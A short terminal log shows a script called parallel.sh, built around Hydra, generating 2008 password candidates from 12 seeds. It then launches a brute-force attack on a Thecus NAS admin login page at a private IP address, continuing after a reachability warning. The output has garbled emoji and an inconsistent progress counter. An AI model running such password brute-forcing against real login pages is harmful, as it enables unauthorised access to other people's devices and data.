nemetg@IT-2411:~/hydra_v1.1.2_thecus/hydra_dist$ ./parallel.sh thecus.env
ðŸ“‚ Loading configuration from thecus.env
--- ðŸš€ Hydra Parallel Orchestrator (Multi-Seed Generation) ---
â™»ï¸  Resume last session? (y/N): n
ðŸ—‘ï¸  Starting fresh session.
Target: http://192.168.1.250/adm/login.php
Local LAN IP: 172.26.209.66
LAN Access: http://172.26.209.66:8082
ðŸ” Checking connectivity to 192.168.1.250...
âš ï¸  Warning: URL http://192.168.1.250/adm/login.php seems unreachable (No HTTP response).
Continue anyway? (y/n): y
Found 12 base seeds in passwords.txt.
ðŸ“¦ Phase 1/2: Generating passwords...
ðŸ”— Creating seed combinations...
   > Progress: [##############################] 100% (2008/1000)
âœ… Generation Complete. (Duration: 0s)
ðŸŒ Note: Local test server not started (Target is remote).
ðŸ”¥ Phase 2/2: Launching brute force (2008 passwords)...
   > Progress: [######                        ] 20% (403/2008)
